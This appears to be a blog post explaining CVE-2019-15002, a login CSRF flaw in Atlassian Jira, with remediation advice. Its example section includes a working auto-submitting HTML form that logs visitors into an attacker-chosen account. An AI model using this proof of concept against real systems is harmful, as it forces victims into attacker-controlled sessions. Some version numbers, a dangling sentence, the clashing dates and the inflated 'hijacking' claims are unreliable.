CVE-2019-15002 - How A Simple CSRF Bug Let Attackers Hijack Atlassian Jira Logins

*Published: 2024*


Atlassian Jira is a popular tool for tracking issues, bugs, and projects in companies all over the world. But in 2019, a critical security bug called CVE-2019-15002 threatened a lot of Jira users. Let's see what happened, how the vulnerability worked, and what attackers could do with it.

What is CVE-2019-15002?

CVE-2019-15002 describes a serious Cross-Site Request Forgery (CSRF) flaw in Atlassian Jira, affecting versions 7.6.4 up to 8.1.. CSRF lets an attacker trick your browser into performing unwanted actions—like logging in to Jira—without you even knowing.

A big part of modern web security is using a CSRF token on sensitive forms, like login forms. This token is unique for each user session, and without it, attackers can do some nasty tricks.

The Root Cause

In the affected Jira versions, the login form did not require a CSRF token. That means anyone could send a POST request to the login endpoint, and Jira wouldn't know if it was a legitimate user clicking the login button—or an attacker forging the request from another page!

That site sends a hidden login request to Jira with credentials the attacker chooses.

Now Jira logs you into an account chosen by the attacker. From there, the attacker can use your browser to do more damage, especially if you have high privileges.

Example Exploit

Imagine Alice is an administrator for her company’s Jira. Mallory the attacker wants Alice to do something in Jira while logged in as *Mallory's designated account*. Mallory can lure Alice to her website and run code like this:

<!-- Malicious HTML page that logs the visitor into Jira -->
<html>
  <body>
    <form action="https://jira.yourcompany.com/login.jsp"; method="POST" id="csrfForm">
      <input type="hidden" name="os_username" value="attackeruser">
      <input type="hidden" name="os_password" value="password123">
      <input type="hidden" name="login" value="Log In">
    </form>
    <script>
      document.getElementById('csrfForm').submit();
    </script>
  </body>
</html>

Alice is now logged into Jira as attackeruser.

If Alice takes actions (like creating tickets, changing settings, etc.), Jira records them under attackeruser, not Alice! Even worse, with some social engineering, Mallory may gain access to internal resources or escalate her privileges.

Why is This Serious?

- Account Hijacking – Attackers can force admins or users to perform actions as a different user, which can be used for privilege escalation or hiding malicious activity.
- Audit Trail Manipulation – All actions appear as if performed by the attacker’s chosen account.
- No User Interaction Needed – The user doesn’t need to click anything. Just visiting a malicious web page is enough.

How To Protect Jira

Atlassian fixed this vulnerability by adding proper CSRF protections to the login form. The only safe solution is to upgrade Jira to version 8.2. or newer. You can read Atlassian’s advisory here:

- Atlassian Security Advisory - 2019-08-06
- CVE Details: CVE-2019-15002

Conclusion

CSRF bugs like CVE-2019-15002 are tricky—they don't need to break passwords or guess credentials. All it takes is a missing CSRF token and a little social engineering.

If you use Jira, always keep it up to date. Simple oversights like a missing CSRF token can lead to very big problems, fast.

References

- Atlassian Official Advisory
- NIST CVE database entry
- Common Weakness Enumeration: CWE-352 (Cross-Site Request Forgery)

*Stay safe! Secure your web applications and be aware of how even small bugs can open big doors for attackers.*

Timeline

Published on: 02/11/2025 18:15:18 UTC
Last modified on: 02/28/2025 21:15:13 UTC